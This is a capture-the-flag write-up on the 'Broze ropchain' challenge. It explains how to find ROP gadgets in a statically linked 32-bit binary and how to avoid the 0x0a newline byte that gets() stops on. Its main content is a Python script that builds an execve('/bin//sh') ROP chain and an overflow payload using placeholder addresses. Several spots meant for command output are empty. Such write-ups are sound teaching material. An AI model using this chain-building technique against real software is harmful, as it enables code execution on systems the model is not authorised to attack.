Broze ropchain is a simple pwn challenge with a 32-bit binary.

The first step is to check the binary's protections with the checksec utility:


As checksec shows, no protection is enabled, so the binary is easy to pwn. Moreover, it is statically linked:


This means it is easy to find gadgets for our ROP chain: the whole libc is inside the binary and, with no PIE, every address is fixed. In fact, ROPgadget can generate a chain directly with the --ropchain option:


There is only one problem: some of the gadgets have an address containing the byte 0x0a, which gets() treats as a newline and stops reading at, so the chain would be truncated there. Those gadgets have to be replaced with equivalent ones whose addresses contain no 0x0a (the same check applies to every immediate in the chain, such as .data addresses and the "/bin//sh" string; NUL bytes, on the other hand, are fine because gets() copies them). The final result is the following exploit:
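As an added example (not the exploit from this writeup), the following Python builds the same kind of 32-bit execve("/bin//sh") chain that ROPgadget --ropchain emits, but picks, for each gadget, the first candidate address free of 0x0a and refuses to pack a chain if any dword (gadget or immediate) still contains one. The gadget addresses, the .data address and the padding offset are hypothetical placeholders; in practice they come from the ROPgadget output for the real binary.

```python
#!/usr/bin/env python3
"""Build a 32-bit execve("/bin//sh") ROP chain while rejecting gadgets whose
address contains a byte the input function will not deliver.

All addresses below are hypothetical and NOT taken from the challenge binary;
fill CANDIDATES from `ROPgadget --binary <file>` output for a real target."""
import struct

# gets() stops at '\n' (0x0a), so no dword of the chain may contain it.
# gets() does copy NUL bytes, so 0x00 is *not* a bad byte here.
BAD_BYTES = {0x0a}

# Constructed sample gadget table: semantic -> candidate addresses (hypothetical).
CANDIDATES = {
    "pop edx ; ret":                  [0x08060a2b, 0x0806f2ab],  # first contains 0x0a
    "pop eax ; ret":                  [0x080b0a06, 0x080b8a16],  # first contains 0x0a
    "mov dword ptr [edx], eax ; ret": [0x0807b4f1],
    "pop ebx ; ret":                  [0x080481c9],
    "pop ecx ; ret":                  [0x080df171],
    "xor eax, eax ; ret":             [0x08049f3b],
    "int 0x80":                       [0x0806d5e0],
}
DATA_ADDR = 0x080ea060  # hypothetical writable .data address (no PIE, so it is fixed)


def has_bad_byte(value: int) -> bool:
    """True if any byte of the little-endian dword is in BAD_BYTES."""
    return any(b in BAD_BYTES for b in struct.pack("<I", value & 0xFFFFFFFF))


def first_clean(addrs):
    """First address without bad bytes, or None if every candidate is tainted."""
    return next((a for a in addrs if not has_bad_byte(a)), None)


def pick(gadgets, semantic):
    """Select a usable gadget for `semantic`, failing loudly if none is clean."""
    addr = first_clean(gadgets[semantic])
    if addr is None:
        raise ValueError(f"no gadget for {semantic!r} free of bad bytes")
    return addr


def build_execve_chain(gadgets, data_addr):
    """Same plan as ROPgadget --ropchain: write "/bin//sh\\0" into .data, then
    execve(ebx=&str, ecx=&NULL, edx=&NULL) with eax=11 via int 0x80."""
    pop_edx = pick(gadgets, "pop edx ; ret")
    pop_eax = pick(gadgets, "pop eax ; ret")
    mov_edx_eax = pick(gadgets, "mov dword ptr [edx], eax ; ret")
    pop_ebx = pick(gadgets, "pop ebx ; ret")
    pop_ecx = pick(gadgets, "pop ecx ; ret")
    xor_eax = pick(gadgets, "xor eax, eax ; ret")
    int80 = pick(gadgets, "int 0x80")

    chain = []
    # write the string one dword at a time: edx = destination, eax = 4 chars
    for off, word in ((0, b"/bin"), (4, b"//sh")):
        chain += [pop_edx, data_addr + off,
                  pop_eax, struct.unpack("<I", word)[0],
                  mov_edx_eax]
    # NUL-terminate the string; this zero dword also serves as argv/envp = {NULL}
    chain += [pop_edx, data_addr + 8, xor_eax, mov_edx_eax]
    # NUL bytes survive gets(), so load 11 directly instead of 11 x "inc eax"
    chain += [pop_ebx, data_addr, pop_ecx, data_addr + 8, pop_edx, data_addr + 8,
              pop_eax, 11, int80]
    return chain


def pack_chain(chain):
    """Pack to bytes, refusing any dword (gadget or immediate) with a bad byte."""
    tainted = [i for i, v in enumerate(chain) if has_bad_byte(v)]
    if tainted:
        raise ValueError(f"chain dwords {tainted} contain bad bytes")
    return b"".join(struct.pack("<I", v) for v in chain)


def build_payload(chain, padding):
    """Padding up to the saved return address; the offset is binary-specific and assumed."""
    return b"A" * padding + pack_chain(chain)


if __name__ == "__main__":
    import sys
    rop = build_execve_chain(CANDIDATES, DATA_ADDR)
    payload = build_payload(rop, padding=44)  # 44 is a placeholder offset
    # the trailing newline terminates gets(); pipe into the target: python3 rop.py | ./target
    sys.stdout.buffer.write(payload + b"\n")
```

The check in pack_chain is the important part: ROPgadget only filters gadget addresses, so the immediates you add by hand (the .data pointers, the string words, the syscall number) need the same scan before the payload goes out.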


And finally run it:

